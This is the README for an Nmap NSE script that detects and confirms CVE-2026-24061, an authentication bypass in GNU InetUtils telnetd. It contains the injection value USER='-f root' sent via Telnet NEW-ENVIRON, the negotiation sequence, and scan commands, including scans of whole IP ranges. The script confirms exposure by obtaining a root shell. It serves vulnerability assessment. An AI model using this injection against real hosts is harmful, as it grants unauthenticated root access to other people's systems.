Share
## https://sploitus.com/exploit?id=050660E6-A5E0-5EA8-B624-03701B9D145F
# CVE-2026-24061 โ€” GNU InetUtils telnetd Authentication Bypass
## Nmap NSE Detection Script

[![Nmap NSE](https://img.shields.io/badge/Nmap-NSE%20Script-4B8BBE)](https://nmap.org/nsedoc/)
[![CVE](https://img.shields.io/badge/CVE-2026--24061-critical)](https://nvd.nist.gov/vuln/detail/CVE-2026-24061)
[![CVSSv3](https://img.shields.io/badge/CVSSv3-9.8%20Critical-red)](https://nvd.nist.gov/vuln/detail/CVE-2026-24061)
[![License](https://img.shields.io/badge/License-Same%20as%20Nmap-green)](https://nmap.org/book/man-legal.html)

---

## Overview

This Nmap NSE script detects **CVE-2026-24061**, an authentication bypass vulnerability
in **GNU InetUtils telnetd** versions **1.9.3 through 2.7**.

By sending a crafted `USER` environment variable of the form `-f ` during
Telnet option negotiation, an unauthenticated attacker can obtain a shell with the
privileges of the specified local user โ€” including `root` โ€” **without providing any
password**.

> **Intended Use:** Authorized penetration testing and vulnerability assessment only.  
> Running this script against systems without explicit written permission is illegal.

---

## Vulnerability Details

| Field           | Value                                         |
|-----------------|-----------------------------------------------|
| CVE ID          | CVE-2026-24061                                |
| Affected        | GNU InetUtils telnetd 1.9.3 โ€“ 2.7            |
| CVSSv3 Score    | **9.8 Critical**                             |
| Vector          | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Type            | Authentication Bypass (CWE-287)               |
| Disclosure      | 2026-01-01                                    |

### How it works

GNU InetUtils `telnetd` uses the Telnet **NEW-ENVIRON** option (RFC 1572) to receive
environment variables from the client during the negotiation phase. The `login(1)`
program is then invoked with those variables.

The vulnerability arises because `telnetd` passes the `USER` variable directly to
`login` without sanitising it. The `login` program on Linux accepts a `-f `
flag meaning *"pre-authenticated, do not check password"*. By injecting
`USER="-f root"` via the NEW-ENVIRON payload, the attacker bypasses authentication
entirely.

```
Client โ†’ Server:  IAC SB NEW-ENVIRON IS  VAR "USER"  VALUE "-f root"  IAC SE
Server response:  spawns login -f root  โ†’  root shell, no password required
```

---

## Script Details

| Field       | Value                                              |
|-------------|----------------------------------------------------|
| Filename    | `telnet-vuln-cve-2026-24061.nse`                  |
| Categories  | `vuln`, `exploit`, `intrusive`                    |
| Port        | TCP/23 (telnet)                                   |
| Tested on   | Nmap 7.94 / 7.98, Windows & Linux                 |

### Detection Method

The script performs a **full Telnet negotiation** mirroring the exact byte sequence
of a real `telnet -a` client session (reconstructed from Wireshark capture):

1. Receive server's opening IAC burst (`DO TTYPE`, `DO TSPEED`, `DO ENVIRON`, โ€ฆ)
2. Reply with complete client capability announcement (`WILL TTYPE`, `WILL LINEMODE`, โ€ฆ)
3. Complete sub-negotiation round (`SB TSPEED`, `SB ENVIRON`, `SB TTYPE`)
4. Inject crafted `USER='-f '` in the NEW-ENVIRON IS payload
5. Complete the `WILL ECHO` / `DO BINARY` / **`WONT LINEMODE`** sequence  
   *(critical โ€” without this, telnetd cannot finalise PTY setup)*
6. Check whether the server sends a login shell prompt **without** a password challenge

**Result states:**

| State            | Meaning                                                        |
|------------------|----------------------------------------------------------------|
| `EXPLOIT`        | Shell prompt received โ€” bypass confirmed                      |
| `LIKELY_VULN`    | ENV payload accepted, no password prompt, but no shell prompt |
| `NOT_VULN`       | Password prompt seen, or negotiation did not complete         |

---

## Installation

### Linux

```bash
# Copy to Nmap scripts directory
sudo cp telnet-vuln-cve-2026-24061.nse /usr/share/nmap/scripts/

# Update script database
sudo nmap --script-updatedb
```

### Windows

```cmd
# Copy to Nmap scripts directory (adjust path if needed)
copy telnet-vuln-cve-2026-24061.nse "C:\Program Files (x86)\Nmap\scripts\"

# Update script database (run as Administrator)
nmap --script-updatedb
```

---

## Usage

### Basic scan (default user: root)

```bash
nmap -p 23 --script telnet-vuln-cve-2026-24061 
```

### Specify a different user

```bash
# Short form
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args user=kali 

# Medium form
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args telnet-user=kali 

# Fully qualified
nmap -p 23 --script telnet-vuln-cve-2026-24061 \
    --script-args telnet-vuln-cve-2026-24061.user=kali 
```

### Scan an IP range

```bash
nmap -p 23 --script telnet-vuln-cve-2026-24061 192.168.1.0/24
```

### Verbose / Debug output

```bash
nmap -p 23 --script telnet-vuln-cve-2026-24061 -v     # verbose
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d     # debug
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d2    # full hex trace
```

---

## Sample Output

### Vulnerable host

```
PORT   STATE SERVICE
23/tcp open  telnet
| telnet-vuln-cve-2026-24061:
|   VULNERABLE:
|   GNU InetUtils telnetd Authentication Bypass
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2026-24061
|     Risk factor: Critical  CVSSv3: 9.8
|     Description:
|       The telnetd service in GNU InetUtils (1.9.3 - 2.7) allows
|       authentication bypass via a crafted USER environment variable.
|       Sending '-f ' results in an unauthenticated login shell.
|     Extra information:
|       Authentication bypassed: shell prompt received after injecting
|       USER='-f root' -- no password challenge was presented.
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2026-24061
|       https://github.com/JayGLXR/CVE-2026-24061-POC
|_      https://github.com/SafeBreach-Labs/CVE-2026-24061
```

### Not vulnerable host

```
PORT   STATE SERVICE
23/tcp open  telnet
```
*(no script output โ€” NOT_VULN is silent by design, standard Nmap convention)*

---

## Script Arguments

| Argument                              | Alias(es)              | Default | Description                  |
|---------------------------------------|------------------------|---------|------------------------------|
| `telnet-vuln-cve-2026-24061.user`    | `telnet-user`, `user`  | `root`  | Username to inject via `-f`  |

---

## Technical Notes

### Why WONT LINEMODE is critical

GNU InetUtils `telnetd` uses the Linemode negotiation (RFC 1184) to determine the
terminal I/O mode. The server sends `DO LINEMODE` early in negotiation, and the
client initially responds `WILL LINEMODE`. After the ENV payload exchange, the server
sends `WILL ECHO` followed by `DO BINARY`. At this point the client **must** respond
with `WONT LINEMODE` to signal character-at-a-time mode โ€” only then can `telnetd`
complete PTY setup (`ioctl TIOCSWINSZ`) and fork `login`. Without this step, the
server logs `peer died: Inappropriate ioctl for device` and drops the connection.

### NSE Socket API

Nmap's NSE socket API differs from standard Lua socket conventions:

```lua
-- Nmap NSE (correct):
local status, data = sock:receive_bytes(1)
if status == true then -- data is the received string
```

---

## References

- [NVD โ€” CVE-2026-24061](https://nvd.nist.gov/vuln/detail/CVE-2026-24061)
- [PoC by JayGLXR](https://github.com/JayGLXR/CVE-2026-24061-POC)
- [PoC by SafeBreach-Labs](https://github.com/SafeBreach-Labs/CVE-2026-24061)
- [RFC 1572 โ€” NEW-ENVIRON](https://www.rfc-editor.org/rfc/rfc1572)
- [RFC 1184 โ€” Linemode](https://www.rfc-editor.org/rfc/rfc1184)
- [Nmap NSE Documentation](https://nmap.org/book/nse.html)

---

## Disclaimer

This script is provided for **authorized security testing and research purposes only**.
The author is not responsible for any misuse or damage caused by this tool.
Always obtain explicit written permission before testing systems you do not own.